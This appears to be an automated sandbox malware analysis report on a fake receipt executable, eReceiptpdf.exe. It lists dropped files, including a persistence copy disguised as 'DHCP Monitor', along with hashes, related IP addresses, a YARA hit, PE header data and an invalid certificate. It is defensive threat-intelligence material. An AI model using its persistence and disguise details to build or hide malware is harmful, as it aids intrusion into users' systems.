                • 162.159.129.233
                • 162.159.134.233
                payment.exeGet hashmaliciousBrowse
                • 162.159.129.233
                • 162.159.134.233
                peSZa2MV75.exeGet hashmaliciousBrowse
                • 162.159.129.233
                • 162.159.134.233
                ValorantLogin.exeGet hashmaliciousBrowse
                • 162.159.129.233
                • 162.159.134.233
                WPFRegisterStudent.exeGet hashmaliciousBrowse
                • 162.159.129.233
                • 162.159.134.233
                Bi4P9gzPgEuPau5wQ3n3.exeGet hashmaliciousBrowse
                • 162.159.129.233
                • 162.159.134.233
                Ziraat Bankasi Swift Mesaji.exeGet hashmaliciousBrowse
                • 162.159.129.233
                • 162.159.134.233
                PO_SBK4128332S.exeGet hashmaliciousBrowse
                • 162.159.129.233
                • 162.159.134.233
                NewOrderPDF.exeGet hashmaliciousBrowse
                • 162.159.129.233
                • 162.159.134.233
                VUsEbEh3jG.exeGet hashmaliciousBrowse
                • 162.159.129.233
                • 162.159.134.233
                cx6hZvW5HV.exeGet hashmaliciousBrowse
                • 162.159.129.233
                • 162.159.134.233
                vergi #U00f6demesi dekontu 26.10.2021,pdf.vbsGet hashmaliciousBrowse
                • 162.159.129.233
                • 162.159.134.233
                6iUUqpBnNi.exeGet hashmaliciousBrowse
                • 162.159.129.233
                • 162.159.134.233
                wnS9iqUWXu.exeGet hashmaliciousBrowse
                • 162.159.129.233
                • 162.159.134.233
                p9Ts9VV2NZ.exeGet hashmaliciousBrowse
                • 162.159.129.233
                • 162.159.134.233
                x6d8L7ju1g.exeGet hashmaliciousBrowse
                • 162.159.129.233
                • 162.159.134.233
                SfFC2cykMw.exeGet hashmaliciousBrowse
                • 162.159.129.233
                • 162.159.134.233
                0L3hPPGkT5.exeGet hashmaliciousBrowse
                • 162.159.129.233
                • 162.159.134.233
                uuV301Pw71.exeGet hashmaliciousBrowse
                • 162.159.129.233
                • 162.159.134.233

                Dropped Files

                No context

                Created / dropped Files

                C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
                Process:C:\Users\user\Desktop\eReceiptpdf.exe
                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                Category:dropped
                Size (bytes):182200
                Entropy (8bit):5.309905162463364
                Encrypted:false
                SSDEEP:3072:Mc7omjUjSljUDwSFxCCSQUMzTjSMzTjoIe1Uhkef:Mc7omnjUcSDCCSHBe
                MD5:C97F7F2DEA671626AB1C6D3D1AD59422
                SHA1:DE5BC22D6558A46F99784598F550A3AFFAB19ADA
                SHA-256:9B65DB8538653AB63132C23E45852D5455C9CC661655FA217B42A830B0EFD24C
                SHA-512:0C9FF6B31C925653C366B9D59A3DDB58A630C8130E6DF700216434C38E125663EBC8596CF830AEE5B45C31894F014C279AA94AACE44560BBC33FE0F2A5F89B08
                Malicious:true
                Yara Hits:
                • Rule: SUSP_PE_Discord_Attachment_Oct21_1, Description: Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, Author: Florian Roth
                Antivirus:
                • Antivirus: ReversingLabs, Detection: 22%
                Reputation:low
                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...0.wa..............P.................. ........@.. ....................... .......f....@.....................................S.......(............................................................................ ............... ..H............text....... ...................... ..`.rsrc...(...........................@..@.reloc..............................@..B........................H............/......v....o...(..........................................M...Z...........................................................................................@...............................................................................................................................................................................................!...........L.......!...T...h...i...s... ...p...r...o...g...r...a...m... ...c...a...n...n...o...t... ...b...e... ...r...
                C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe:Zone.Identifier
                Process:C:\Users\user\Desktop\eReceiptpdf.exe
                File Type:ASCII text, with CRLF line terminators
                Category:dropped
                Size (bytes):26
                Entropy (8bit):3.95006375643621
                Encrypted:false
                SSDEEP:3:ggPYV:rPYV
                MD5:187F488E27DB4AF347237FE461A079AD
                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                Malicious:true
                Reputation:high, very likely benign file
                Preview: [ZoneTransfer]....ZoneId=0
                C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_eReceiptpdf.exe_8b4f881e59df9de8ddc34724ddfe232be31bbe18_8b97a11e_18b17b1c\Report.wer
                Process:C:\Windows\SysWOW64\WerFault.exe
                File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                Category:dropped
                Size (bytes):65536
                Entropy (8bit):1.1906782740485125
                Encrypted:false
                SSDEEP:192:NBxccqkzwCmHBUZMXyaKeCvVD//u7snS274It+:L7qkzwDBUZMXyaeZ//u7snX4It+
                MD5:5462F7C9E9CD7988EF92237CDCE1D0D0
                SHA1:8B87752C42D90C839976E493804F2E292CEC1A5B
                SHA-256:5069FE5323186C071568C54CDA13AB826882CA0C8B2EABAB23F1C70CC8E0A803
                SHA-512:1566C64F172B96F0F29723183FD5664FB305D1C97A19C9146AF0C50A5F856CC6081E1286FDE649FF08F6EC36F85F75F533155FC960CA8202C51C6703AE183728
                Malicious:false
                Reputation:low
                Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.2.7.9.8.0.2.6.0.2.7.8.2.9.7.6.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.7.9.8.0.2.6.0.7.8.2.9.8.3.6.1.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.d.a.f.a.5.a.5.-.e.a.3.9.-.4.5.6.4.-.a.b.f.b.-.3.5.6.7.a.d.6.e.d.a.4.b.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.6.d.f.2.7.f.5.-.0.1.1.c.-.4.8.a.7.-.9.f.b.c.-.a.8.b.a.6.c.c.b.2.4.e.2.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.e.R.e.c.e.i.p.t.p.d.f...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.P.a.y.r.o.l.l. .M.a.n.a.g.e.m.e.n.t. .S.y.s.t.e.m...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.d.4.-.0.0.0.1.-.0.0.1.c.-.f.3.2.a.-.d.e.d.4.1.9.c.b.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.c.f.1.5.c.9.b.a.8.6.f.2.d.b.2.d.9.f.1.9.a.3.3.e.5.4.0.4.4.0.c.b.0.0.0.0.0.0.0.0.!.0.0.0.0.d.e.5.b.c.2.2.d.6.5.5.8.a.4.6.f.9.9.
                C:\ProgramData\Microsoft\Windows\WER\Temp\WER6061.tmp.dmp
                Process:C:\Windows\SysWOW64\WerFault.exe
                File Type:Mini DuMP crash report, 15 streams, Wed Oct 27 10:03:23 2021, 0x1205a4 type
                Category:dropped
                Size (bytes):327799
                Entropy (8bit):3.668715040088311
                Encrypted:false
                SSDEEP:3072:xOG+ADhh9gIOgF5jSa0JbyUCgUkmTaY3d0X6wNjd+pConjDNioBgd:xXth9RpDzi2TjfTaOd0qwSpCZ
                MD5:B6B17EF01B8C0DABF6E740B350F847FF
                SHA1:31C1E3E22E4AD3F550ABF6305B36036678AE0056
                SHA-256:EB1B757EA7FEB56453AC4FA39D0BC509F0C70FE5BE2634DA08989A9BA917DA69
                SHA-512:86D729B140590970A4EDB91E83DACB6436DC9312CED934F40F8F86B2CB596E9A3F7DA0E3495EF737EC15C8291BB74E7C5648A5E2B9EE1662880B53960763C155
                Malicious:false
                Reputation:low
                Preview: MDMP....... ........#ya....................................T....)......$1..\b..........`.......8...........T............V..w............)...........+...................................................................U...........B......h,......GenuineIntelW...........T............#ya.............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.........................................................................................................................................................................................................................................................................................................................................................................................................................................
                C:\ProgramData\Microsoft\Windows\WER\Temp\WER692C.tmp.WERInternalMetadata.xml
                Process:C:\Windows\SysWOW64\WerFault.exe
                File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                Category:dropped
                Size (bytes):8408
                Entropy (8bit):3.689651747888066
                Encrypted:false
                SSDEEP:192:Rrl7r3GLNiqY6byC6YFGSU94gmfZlS0CprU89b6LsfNem:RrlsNiN6+C6YkSU94gmfrS96Qft
                MD5:4686EA433BD678125ADD30FD1D755CE4
                SHA1:BA199A4949A2B24F5672DDD45B30F996BABED108
                SHA-256:55E3318CD87323BE03658B246F0F1A5898012229B3795E6CADFCDCFE0DA9EB07
                SHA-512:833A7FEC625EB8C9C386382138FFB196EF5483BAB0A711553B627C771D3AECBDB33A598A2D1EB989E39F918BC74111FC3616A230B079E2A99207CE2E1482A86D
                Malicious:false
                Reputation:low
                Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.1.2.4.<./.P.i.d.>.......
                C:\ProgramData\Microsoft\Windows\WER\Temp\WER6A84.tmp.xml
                Process:C:\Windows\SysWOW64\WerFault.exe
                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                Category:dropped
                Size (bytes):4775
                Entropy (8bit):4.4612256114671025
                Encrypted:false
                SSDEEP:48:cvIwSD8zs+JgtWI933WSC8B2z8fm8M4JLVNFFAC+q8v+VNJ3e6s0cCd:uITf0kGSNgQJpSCKO7ls0ld
                MD5:FE9BFA6D90B9F600EEEFD6EA6F327B00
                SHA1:74ACABA29A9F17F8B7EEC6EE7D5A3D63A9B6A827
                SHA-256:17AD7AB4985D30CF261A236D90D1A9538C422AE4933669BDEF62277C3F649FBC
                SHA-512:2EBDF82AEE9602400C8E2B36D8B1C361249A45BD2D1D6E1DF1B52A65E6EE541BBF48042C3953492F45B55EC396F1C3CCC8D3AE3F52F45ED9F5B54D9818720881
                Malicious:false
                Reputation:low
                Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1228034" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\dhcpmon.exe.log
                Process:C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
                File Type:ASCII text, with CRLF line terminators
                Category:dropped
                Size (bytes):1039
                Entropy (8bit):5.365622957937216
                Encrypted:false
                SSDEEP:24:ML9E4Ks2wKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7K84jE4Ks:MxHKXwYHKhQnoPtHoxHhAHKzvKvjHKs
                MD5:AE8CFF33270358D6EC23793128B3EF2F
                SHA1:5E6B156157EDEA4222A5E0C258AE9ADEBB8CB7CE
                SHA-256:498EAB9F855E7CE9B812EAD41339A9475127F0C8E7249033B975071D2292220C
                SHA-512:473111AD332D5E66724AFB0CE5A1E1C97890D60484A818D1DB8C2386A99C05BAE6C9D5C535DDFB6790BF5707C153502B938BE201393A3D70342A62902E0A3C98
                Malicious:false
                Reputation:moderate, very likely benign file
                Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21e8e2b95c\System.Xml.ni.dll",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutra
                C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\catalog.dat
                Process:C:\Users\user\Desktop\eReceiptpdf.exe
                File Type:data
                Category:dropped
                Size (bytes):248
                Entropy (8bit):6.997351629001838
                Encrypted:false
                SSDEEP:6:X4LDAnybgCFcps0Oa706d+6zsThvr9ohWCsT9ZIWyq4B:X4LEnybgCF07hNgtr9oE/3oB
                MD5:EDB5F15385E111D1F43093F56149A3FB
                SHA1:D865A47A0997848D5D4005B857A3FD0027BCD3C6
                SHA-256:1995E579108E8EB3B6C00893E855E8204D1C36F150088736556B66BE445E7957
                SHA-512:C3C0ADA45BECD863F41369F766E719A6FDC7807096F17FAEFBA6466EBEE4830524046DAFB186E1DFB50B15B07F0877ECD3B4E5993B83E8D67FF5A68D4F2ACCFE
                Malicious:false
                Preview: Gj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h...t.+..Z\.. .i.... S....}FF.2...h.M+....L.#.X..+......*.............S.Ty.K.&....q$.7....."....F... .N.k.C.X.D.^.....u.\...X........s^.;...m/.,7X..v"B..#.T.F L...h.....t 5.|Z
                C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat
                Process:C:\Users\user\Desktop\eReceiptpdf.exe
                File Type:Non-ISO extended-ASCII text, with no line terminators
                Category:dropped
                Size (bytes):8
                Entropy (8bit):3.0
                Encrypted:false
                SSDEEP:3:S:S
                MD5:A0F35B4C1FE7C2E1A05921A9DAB32884
                SHA1:D063CCA8388E40753F6030A57BDADDB23CC17ACB
                SHA-256:4D04BF011BDBA17327EC086E7611C55DC409BF57B80C6B29B0C24ED6ADE72585
                SHA-512:0D937ABC51081EDA229EB5F24138945DBCEA6A9B9260F75320BDCD5BA968BDB910F054AEF9DA47E520D7D69F2729C1C334AC36BDA51790C6056274AD65E0DBF0
                Malicious:true
                Preview: ._6.0..H
                C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\settings.bin
                Process:C:\Users\user\Desktop\eReceiptpdf.exe
                File Type:data
                Category:modified
                Size (bytes):40
                Entropy (8bit):5.153055907333276
                Encrypted:false
                SSDEEP:3:9bzY6oRDT6P2bfVn1:RzWDT621
                MD5:4E5E92E2369688041CC82EF9650EDED2
                SHA1:15E44F2F3194EE232B44E9684163B6F66472C862
                SHA-256:F8098A6290118F2944B9E7C842BD014377D45844379F863B00D54515A8A64B48
                SHA-512:1B368018907A3BC30421FDA2C935B39DC9073B9B1248881E70AD48EDB6CAA256070C1A90B97B0F64BBE61E316DBB8D5B2EC8DBABCD0B0B2999AB50B933671ECB
                Malicious:false
                Preview: 9iH...}Z.4..f.~a........~.~.......3.U.
                C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\storage.dat
                Process:C:\Users\user\Desktop\eReceiptpdf.exe
                File Type:data
                Category:dropped
                Size (bytes):330552
                Entropy (8bit):7.999418479033017
                Encrypted:true
                SSDEEP:6144:e+H5lVSPLgM+LiESqVzsh59rP3BcS8RlST0Hp0LXDLEyxgQO:eQ5HSPlESqVziLmSMlSi0LXDLfgQO
                MD5:4167AA6253824B81F8DAD83994B5E6C2
                SHA1:B269E4777C32C97BA8C17081720960272D84D3D8
                SHA-256:A526941778F055092275D2E6BAB2F65CB5D55F83B3CBCE66F15B260A2AC9D92B
                SHA-512:87FA9926E808EE50A726462EBCC26C0AAF99EAB6FEE18B19E8D5DFD2D4C6ED3D6B8191B8859AD324EC2AF579EEB42124116073B40DA3060AF5215526F5F6BAF1
                Malicious:false
                Preview: ^.H.X8O......z.....@u].....}.... ...jr.M.6.....v.3P6...._.xh.ku..A.~..!..6N)R'.....u1!....5..F...C..Y.&.A*.pd-..c.A.8`...|.)@...r..`.;...UPM.......B...a.O.y....4..Z....?[..Et..:..`......k^?tR]..".lY....9..^M..VW.j...i.0-.....B.|.PW....;mG.V...6&.<G..Ri.qo...I.`nW...Q.'.....xJ........f.. ..Oh/xt.k.1.c..496..[=.lA8.X.JM.a.......G.S"."3).C3.\J..3^..$d...k..m...R....0.@.>N.]...Zt.xKDF~....5...H.y...'#Q...h.cp...I.9'..@..u.0.9..ZY.[k...^..^a.=..1.P..8Y.r.Y..e...V..b!#o.r...kz..a..].~yU.A..hPx..U.U.x...;..xb.o.f..._q..-=.*..8.b......;..8R|0i..........<....0i...}A..-.:#3..\.....-.../!..#rH..A.2.h.O..)`1..#.\..8.5.k..=,..;l........Mvk..h.......".e..y.I..Y...@.`.s?..c..p.).a..%.g;0....R.n...K.h.\z9..@p1..O...j3x.;>Z..........sy{.f.x..N.:..l...w.sPR....LN..-J><..'...3.j...".w'...9P0C.T..T..kK@.P]SmB<.~.......)h....J.U|%..I...:_.3.y.........b..g..`.......Z......;.QM...A...:.....}...=).1..(.=4.O...}..8.r8....#.I_b*..D..&.....E.kH...B.
                C:\Windows\appcompat\Programs\Amcache.hve
                Process:C:\Windows\SysWOW64\WerFault.exe
                File Type:MS Windows registry file, NT/2000 or above
                Category:dropped
                Size (bytes):1572864
                Entropy (8bit):4.278108139589165
                Encrypted:false
                SSDEEP:12288:izNzYu8hJ1K8chSM525VSGmoX65h5B1H/Lfo2HH5oUY2n7zS90Bs2:iNzYu8hJ1K8chSkA
                MD5:A9E2F8F21ED07DE60F1E47187142AE80
                SHA1:691F8A27019476DEF32773CFDBB38179390CCBFD
                SHA-256:4A527CFF9B8485AB0E787A7DB400D4C44EB4CDDDB6C476A3C2CAE92328D74298
                SHA-512:14C5D81E8D57EE9DCE48E7846CFB8CE406F729FE96825D29C6673FE2C8EA57E5AE89B94EA56C3E1E7320EB6AC4ACF7D17B151AE7EC5BD9014F9F31DD7B044EEC
                Malicious:false
                Preview: regfZ...Z...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtm.....................................................................................................................................................................................................................................................................................................................................................n..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                C:\Windows\appcompat\Programs\Amcache.hve.LOG1
                Process:C:\Windows\SysWOW64\WerFault.exe
                File Type:MS Windows registry file, NT/2000 or above
                Category:dropped
                Size (bytes):32768
                Entropy (8bit):4.183754949213674
                Encrypted:false
                SSDEEP:768:m1ZdCWMwqh7rJFftx1eJ4X1FFf7gBqX7eq5QMVyi6aX4LXwuz+W2m:Xf7zIaiCRq1
                MD5:CC79734D7A447376082BBE005428051B
                SHA1:AFCDAED2F7EDC1ECAB0E9905933DFB0505D5CAE8
                SHA-256:098495EF3E46670A60243875BC13E5C91B2E40AD7D922CB86F7A6EF629B225F8
                SHA-512:2A39439E281EDFAB0B5BE90DC25B140951C15E25DF206DEE5A2521C9FB684A3419A8F4D00190B6BDE5590773469A448813745795EA29143DA1576EB4BB2059F7
                Malicious:false
                Preview: regfY...Y...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtm.....................................................................................................................................................................................................................................................................................................................................................n..HvLE.~......Y............[.l....C.............. ....... .......0................... ..hbin................p.\..,..........nk,..x..........@........................... ...........................&...{ad79c032-a2ea-f756-e377-72fb9332c3ae}......nk ..x.......... ........................... .......Z.......................Root........lf......Root....nk ..x.......................}.............. ...............*...............DeviceCensus.......................vk..................WritePer

                Static File Info

                General

                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                Entropy (8bit):5.309905162463364
                TrID:
                • Win32 Executable (generic) Net Framework (10011505/4) 49.98%
                • Win32 Executable (generic) a (10002005/4) 49.93%
                • Windows Screen Saver (13104/52) 0.07%
                • Win16/32 Executable Delphi generic (2074/23) 0.01%
                • Generic Win/DOS Executable (2004/3) 0.01%
                File name:eReceiptpdf.exe
                File size:182200
                MD5:c97f7f2dea671626ab1c6d3d1ad59422
                SHA1:de5bc22d6558a46f99784598f550a3affab19ada
                SHA256:9b65db8538653ab63132c23e45852d5455c9cc661655fa217b42a830b0efd24c
                SHA512:0c9ff6b31c925653c366b9d59a3ddb58a630c8130e6df700216434c38e125663ebc8596cf830aee5b45c31894f014c279aa94aace44560bbc33fe0f2a5f89b08
                SSDEEP:3072:Mc7omjUjSljUDwSFxCCSQUMzTjSMzTjoIe1Uhkef:Mc7omnjUcSDCCSHBe
                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...0.wa..............P.................. ........@.. ....................... .......f....@................................

                File Icon

                Icon Hash:00828e8e8686b000

                Static PE Info

                General

                Entrypoint:0x42c7de
                Entrypoint Section:.text
                Digitally signed:true
                Imagebase:0x400000
                Subsystem:windows gui
                Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                Time Stamp:0x6177E630 [Tue Oct 26 11:27:44 2021 UTC]
                TLS Callbacks:
                CLR (.Net) Version:v4.0.30319
                OS Version Major:4
                OS Version Minor:0
                File Version Major:4
                File Version Minor:0
                Subsystem Version Major:4
                Subsystem Version Minor:0
                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                Authenticode Signature

                Signature Valid:false
                Signature Issuer:C=9i1KO9fat1ed1X6, S=2Oc2Y5Yyd396899, L=aade4e1350r4c2a, T=rcf56a519XAM648, E=12e2N595a146006, OU=fD44Es25epaez1d, O=8deA3BO43s5d693, CN=6c307b263c9d46q
                Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                Error Number:-2146762487
                Not Before, Not After
                • 10/26/2021 1:24:00 PM 10/26/2022 1:24:00 PM
                Subject Chain
                • C=9i1KO9fat1ed1X6, S=2Oc2Y5Yyd396899, L=aade4e1350r4c2a, T=rcf56a519XAM648, E=12e2N595a146006, OU=fD44Es25epaez1d, O=8deA3BO43s5d693, CN=6c307b263c9d46q
                Version:3
                Thumbprint MD5:AB71F36F6594C2F5B3FF9A6EADA2B768
                Thumbprint SHA-1:B823C3EC468CB5EC62FF320B9F99ABC32A5C8DBD
                Thumbprint SHA-256:26E2FC9C3773C42CD9D9C5C25DCE1153C2AE8FBAD50B6ED81DF9514382CF3950
                Serial:00977590AC01D2C59332D212DF1A3B0D16

                Entrypoint Preview

                Instruction
                jmp dword ptr [00402000h]
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al

                Data Directories

                NameVirtual AddressVirtual Size Is in Section
                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_IMPORT0x2c7880x53.text
                IMAGE_DIRECTORY_ENTRY_RESOURCE0x2e0000x628.rsrc
                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                IMAGE_DIRECTORY_ENTRY_SECURITY0x2b4000x13b8.text
                IMAGE_DIRECTORY_ENTRY_BASERELOC0x300000xc.reloc
                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                Sections

                NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                .text0x20000x2a7e40x2a800False0.326809512868data5.25117514356IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
